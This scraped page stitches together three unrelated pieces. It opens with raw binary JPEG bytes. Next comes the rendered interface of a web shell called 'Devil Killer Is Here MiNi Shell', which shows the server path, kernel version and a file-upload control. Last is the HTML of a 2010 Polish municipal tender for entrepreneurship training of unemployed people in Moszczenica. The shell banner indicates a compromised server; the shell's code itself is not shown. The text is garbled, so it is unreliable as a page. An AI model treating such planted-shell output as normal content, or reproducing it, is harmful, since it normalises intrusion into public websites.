JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100528/138719-N-2010.html

<p class="kh_header"><b>Moszczenica: Usługa zorganizowania i przeprowadzenia szkolenia dla 45 osób bezrobotnych w zakresie ABC przedsiębiorczościw ramach projektu pn. INICJATYWA WARUNKIEM ROZWOJU finansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VI - Rynek pracy otwarty dla wszystkich, Działanie 6.2 - Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia</b><br>
<b>Numer ogłoszenia: 138719 - 2010; data zamieszczenia: 28.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Moszczenica , ul. Kosowska 1, 97-310 Moszczenica, woj. łódzkie, tel. 044 6169570, faks 044 6169625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.moszczenica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania i przeprowadzenia szkolenia dla 45 osób bezrobotnych w zakresie ABC przedsiębiorczościw ramach projektu pn. INICJATYWA WARUNKIEM ROZWOJU finansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VI - Rynek pracy otwarty dla wszystkich, Działanie 6.2 - Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia szkolenia dla 45 osób bezrobotnych w zakresie ABC przedsiębiorczości w ramach projektu pn. INICJATYWA WARUNKIEM ROZWOJU finansowanym  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VI - Rynek pracy otwarty dla wszystkich, Działanie 6.2 - Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia 
Wspólny Słownik Zamówień 80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego.
2.	Zakres szkolenia obejmuje:
2.1 przeprowadzenie 3 edycji szkoleń składających się z VI modułów tematycznych:
 	
Moduł I: Jak z sukcesem uruchomić i prowadzić własną firmę

Cel:
Przybliżenie uczestnikom szkolenia wiedzy dotyczącej szeroko pojętej przedsiębiorczości a w szczególności podstaw prowadzenia własnej działalności gospodarczej przy wykorzystaniu merytorycznej wiedzy z zakresu marketingu, analizy otoczenia działalności, zasad rozliczeń podatkowych oraz ewidencji księgowej.
Czas trwania: 30 godzin.

Treści programowe:
1.	Pojęcie działalności gospodarczej w rozumieniu ustawy o działalności gospodarczej.
2.	Formy prawne działalności gospodarczej.
3. Obowiązki formalno prawne przy zakładaniu firmy:
-	rejestracja działalności gospodarczej,
-	rejestracja w Urzędzie Skarbowym,
-	zgłoszenie obowiązku ubezpieczeniowego w ZUS,
-	pieczątka firmowa oraz założenie konta bankowego,
-	wypełnienie wniosku o REGON,
-	pozostałe obowiązki formalno prawne.
4. Wybór formy opodatkowania:
-	podatek dochodowy od osób fizycznych ( pojęcie dochodu, źródła przychodu, zwolnienia przedmiotowe, koszty uzyskania przychodu, podstawa obliczania podatku i jego pobór ),
-	podatek od towarów i usług oraz podatek akcyzowy ( przedmiot opodatkowania, podatnicy VAT, Ryczałt, zwolnienia od podatku, deklaracje podatkowe, zapłata podatku, podatek akcyzowy ),
-	podatki i opłaty lokalne ( rodzaje opłat lokalnych, zobowiązania wobec gminy z tytułu prowadzenia działalności gospodarczej ).
5. Zasady prowadzenia księgowości:
-	warunki oraz interpretacja przepisów dotyczących prowadzenia podatkowej księgi przychodów i rozchodów,
-	ewidencja wyposażenia i środków trwałych,
-	ewidencja przychodów oraz ponoszonych kosztów i wydatków,
-	naliczanie i odprowadzanie podatku zryczałtowanego, gdy jest się podatnikiem VAT,
-	zasady wystawiania faktur,
-	przeprowadzanie remanentu.

6. Ubezpieczenie firmy i jej działalności oraz ubezpieczenia zdrowotne i społeczne:
-	rodzaje ubezpieczeń,
-	wysokość i podstawa wymiaru składek oraz wypełnianie dokumentacji ZUS,
-	zgłoszenie pracowników do ubezpieczenia i rozliczanie składek,
-	ubezpieczenia społeczne osób prowadzących działalność gospodarczą.

7. Zewnętrzne źródła finansowania działalności gospodarczej ( kredyty bankowe, kredyty z PUP, środki UE, leasing ).
8. Podstawy marketingu, reklamy i sposoby promowania własnej działalności gospodarczej.
Moduł II: Biznes plan filarem dobrze funkcjonującej firmy.
Cel:
Wprowadzenie uczestników szkolenia w podstawowe zagadnienia związane z realizacja przedsięwzięć gospodarczych, oceną możliwości ich realizacji w odniesieniu do rynku oraz ocena własnych możliwości finansowych i ocena ryzyka.
Czas trwania: 20 godzin.
Treści programowe:
1.  Budowa i układ:
-	główne zadania biznes planu,
-	analiza i wybór strategii działania,
-	oszacowanie ryzyka,
-	ocena rynku,
-	potencjalni partnerzy i konkurencja.
2. Konstruowanie biznes planu:
-	analiza i oszacowanie przychodów i kosztów,
-	ocena mocnych i słabych stron,
-	koncepcja rozwoju.
3. Produkty i usługi:
-	analiza zapotrzebowania na dany produkt lub usługę,
-	opracowanie strategii marketingowej własnej działalności gospodarczej,
-	ocena i analiza konkurencji.
4.Samodzielne wypełnianie wniosku o dofinansowanie przedsięwzięcia.
Moduł III: Etyka w biznesie jako sposób budowania trwałych relacji z klientem
Cel:
Zapoznanie uczestników szkolenia z ważną rolą jaką odgrywa proces komunikacji w życiu zawodowym oraz z czynnikami na niego wpływającymi, a także zwiększenie zdolności wśród uczestników szkolenia do bardziej zrozumiałego prezentowania swoich opinii, przekonań i myśli.
Czas trwania: 10 godzin
Treści programowe:
1.	Sztuka stawiania skutecznych pytań oraz umiejętność budowania jasnych i zwięzłych komunikatów.
2.	Metody budowania satysfakcjonujących i długofalowych relacji z klientem.
3.	Zdolność radzenia sobie z emocjami jako czynnik budowania dobrej atmosfery i relacji w środowisku pracy.
4.	Umiejętność znajdowania konstruktywnych rozwiązań podczas konfliktów.
5.	Techniki asertywnego reagowania na różne formy krytyki.
6.	Techniki, zasady, strategie i chwyty rządzące procesem negocjacji oraz sposoby rozwiązywania sytuacji trudnych.
Moduł IV: Budowanie dobrego wizerunku firmy - drogą do sukcesu
Cel:
Dobry wizerunek firmy to podstawa i warunek jej sukcesu biznesowego. Celem szkolenia jest przekazanie praktycznych umiejętności dotyczących budowania dobrego wizerunku firmy, efektywnego public relations oraz promowanie postaw przedsiębiorczości.
Czas trwania: 10 godzin.
Treści programowe:
1.	Czym jest wizerunek , reputacja i tożsamość firmy - wprowadzenie w tematykę szkolenia.
2.	Czynniki tworzące wizerunek  i tożsamość firmy na rynku:
-	system identyfikacji wizualnej firmy,
-	front i zaplecze firmy - na co klienci zwracają uwagę kontaktując się z naszą firmą,
-	zespół narzędzi służących publicznej prezentacji firmy i jej oferty,
-	system zachowań pracowników firmy  - jak powinny zachowywać się osoby w pierwszym kontakcie z klientem,
-	metody promowania i utrwalania wizerunku firmy.
3.	Czynniki tworzące przewagę konkurencyjną firmy.
4.	Wykorzystanie public relations do budowania wizerunku firmy.
5.	Niszczyciele dobrego wizerunku i reputacji firmy.
6.	Sytuacja kryzysowa w firmie:
-	jak rozpoznać nadciągający kryzys oraz jak się na niego przygotować,
-	budowanie relacji  z mediami i otoczeniem społecznym w kryzysie,
-	public relations dzień po kryzysie.

Moduł V: Skuteczne gospodarowanie sobą w czasie
Cel:
Poprawa organizacji i planowania pracy poprzez umiejętność ustalania priorytetów,
celów krótko - i długoterminowych oraz analiza i poznanie sposobów przeciwdziałania złodziejom czasu.
Czas trwania: 10 godzin.
Treści programowe:
1.	Czas jako zasób - wprowadzenie w tematykę zarządzania czasem.
2.	Poznanie własnego kapitału energii i rytmu pracy w zakresie zarządzania czasem.
3.	Narzędzia ułatwiające zarządzanie czasem - czyli praktyczne wykorzystanie najważniejszych zasad inwestowania swojego czasu.
4.	Hierarchizacja celów przy określeniu kolejności i struktury zadań - umiejętność ustalania priorytetów według ich wartości (ważność a pilność).
5.	Samodyscyplina w zarządzaniu czasem.
6.	Identyfikacja podstawowych problemów i trudności w zarządzaniu czasem
7.	Konflikty celów (odwlekanie, lęk przed ryzykiem i odpowiedzialnością, brak jasnej wizji).
8.	Skuteczny harmonogram dnia oraz prawidłowa organizacja miejsca pracy
Moduł VI: Podstawy technik informatycznych w użytkowaniu komputera.
Cel:
Przygotowanie uczestników do znajomości obsługi komputera w zakresie pojęć technologii informatycznej oraz praktycznych umiejętności wykorzystania komputera w zakresie podstawowym z wybranych modułów Europejskiego Certyfikatu Umiejętności Komputerowych
Czas trwania: 40 godzin.
Treści programowe:
1.	Arkusze kalkulacyjne - podobne do zwykłych formularzy rachunkowych, umożliwiają szybkie wykonywanie obliczeń. Używane są do przygotowania budżetu, opracowania prognoz, sporządzania wykresów i raportów finansowych:
-	praca z aplikacją ( pierwsze kroki z arkuszem kalkulacyjnym, ustawienia programu ),
-	komórki ( wprowadzanie danych, zaznaczanie komórek, wiersze i kolumny, edycja danych, kopiowanie, przenoszenie i usuwanie, szukanie i zamiana ),
-	arkusze ( praca z arkuszami w skoroszycie ),
-	formuły i funkcje ( formuły arytmetyczne, odwołania do komórek, funkcje ),
- formatowanie ( liczby  daty, zawartość komórki, wyrównanie obramowanie komórek ),
-	wykresy i diagramy ( tworzenie wykresów i diagramów ),
-	formatowanie arkusza ( ustawienia arkusza, przygotowanie do wydruku, drukowanie ).

2.	Usługi w sieciach informatycznych - użycie ogólnoświatowej sieci komputerowej do pozyskiwania informacji i szybkiego komunikowania się z innymi użytkownikami komputerów:
-	internet ( podstawowe pojęcia i zasady, bezpieczeństwo w sieci Web, pierwsze  kroki w pracy z przeglądarką, ustawienia programu ),
-	nawigacja między stronami WWW ( dostęp do stron WWW, zakładki, organizacja zakładek ),
-	wyszukiwanie informacji ( użycie wyszukiwarki, przygotowanie stron WWW do wydruku, drukowanie ),
-	poczta elektroniczna ( podstawy poczty elektronicznej, względy bezpieczeństwa, program pocztowy - podstawy, ustawienia programu pocztowego ),
-	listy ( odczytywanie poczty, odpowiadanie na listy, wysyłanie listów, kopiowanie, przenoszenie, usuwanie),
-	zarządzanie skrzynką pocztową ( sposoby zarządzania, książka adresowa, zarządzanie listami odebranymi, przygotowanie do wydruku listu ).

2.2 przeprowadzenie III edycji szkoleń składających się z VI modułów tematycznych realizowanych w ciągu 120 godzin zegarowych,
2.3 szkolenie przeprowadzone w sposób umożliwiający korzystanie przez każdego uczestnika ze stanowiska komputerowego w całym procesie nauczania.
2.4 czas trwania jednego modułu wynosi do 4 tygodni (realizacja 120 godz. zegarowych),
2.5 przewidywany termin realizacji szkoleń:
- I edycja - czerwiec - lipiec 2010r.,
- II edycja - sierpień - wrzesień 2010r.,
- III edycja - grudzień 2010r. - styczeń 2011r.
2.6 liczba uczestników szkolenia łącznie 45 osób w tym:
- I edycja - 15 osób,
- II edycja - 15 osób,
- III edycja - 15 osób.
3. Miejsce szkolenia: Gminna Biblioteka Publiczna w Moszczenicy ul. Dworcowa 16a, 
97-310 Moszczenica
Koszt wynajęcia Sali wynosi 50 zł brutto za 1 godzinę zegarową zajęć dla grupy 15 osób.
UWAGA: Koszt wynajęcia Sali na przeprowadzenie szkoleń należy uwzględnić w cenie usługi i wyszczególnić w preliminarzu oferty.

4. Obowiązki Wykonawcy:
4.1 Wykonawca zobowiązany jest do zapewnienia możliwości korzystania przez uczestnika szkolenia ze stanowiska komputerowego w całym procesie nauczania
4.2 Po otrzymaniu zawiadomienia o wyborze oferty do realizacji usługi Wykonawca zobowiązany jest do dostarczenia harmonogramu szkolenia zgodnie z załącznikiem nr 1 do umowy.
4.3 Prowadzenie list obecności uczestnika na zajęciach (obecność na zajęciach potwierdzona codziennym własnoręcznym podpisem przez uczestnika zajęć) oraz karty pracy wykładowcy zajęć teoretycznych i praktycznych - wzór stanowi załącznik nr 3 i 4 do umowy.
4.4 Prowadzenie dziennika zajęć edukacyjnych zawierających listę obecności i wymiar godzin i tematy zajęć edukacyjnych.
4.5 Bieżącego informowania (najpóźniej w dniu następnym) Zamawiającego o każdej nieobecności uczestnika na szkoleniu lub rezygnacji z uczestnictwa w szkoleniu w trakcie jego trwania.
4.6 Przeprowadzenie sprawdzenia stanu wiedzy i umiejętności kursantów na podstawie sprawdzianów przeprowadzonych po każdym module.
4.7 Zapewnienie bezzwrotnych materiałów dydaktycznych dla każdego uczestnika kursu: min. notatnik, teczka, długopis, skrypty
4.8 Przeprowadzenie zaliczenia końcowego (egzaminu) ukończenia szkolenia, sporządzenie protokołu z egzaminu, przekazanie kopii protokołu egzaminacyjnego.
4.9 Przed wydaniem zaświadczenia o ukończeniu kursu Wykonawca przedstawi wzór takiego zaświadczenia celem akceptacji przez Zamawiającego.
4.10 Powiadomienie Zamawiającego na 3 dni wcześniej o dacie i godzinie oceny końcowej uczestników szkolenia.
4.11 Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut (długość przerw może być ustalana w sposób elastyczny)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga składania wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie zasady spełnia /nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach żądanych na ich potwierdzenie przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie zasady spełnia /nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach żądanych na ich potwierdzenie przez Zamawiającego. Zamawiający uzna warunkek za spełniony, jeżeli wykażą , że w okresie ostatnich 3 lat wykonali lub wykonują co najmniej 2 usługi 
o podobnym charakterze i wartości do przedmiotu zamówienia, (poprzez zamówienie o podobnym charakterze jak w niniejszym postępowaniu należy rozumieć usługę przeprowadzenia lub przerowadzania 2 szkoleń dla osób bezrobotnych o wartości równej lub większej od wartości podanej w formularzu ofertowym złożonej oferty), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie zasady spełnia /nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach żądanych na ich potwierdzenie przez Zamawiającego. Zamawiający uzna warunkek za spełniony, jeżeli wykażą , że dysponują lub będą dysponować co najmniej 15 szt. stanowisk komputerowych wraz z oprogramowaniem w całym procesie nauczania lub załączą pisemne zobowiązanie innych podmiotów do ich udostępnienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie zasady spełnia /nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach żądanych na ich potwierdzenie przez Zamawiającego. Zamawiający uzna warunkek za spełniony, jeżeli wykażą , że zapewnią, aby czynności objęte zamówieniem były wykonywane przez osoby posiadające uprawnienia do przeprowadzenia szkoleń z podaniem kwalifikacji zawodowych, doświadczenia i wykształcenia oraz zakresu (tematyki prowadzenia zajęć) w realizacji przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie zasady spełnia /nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach żądanych na ich potwierdzenie przez Zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
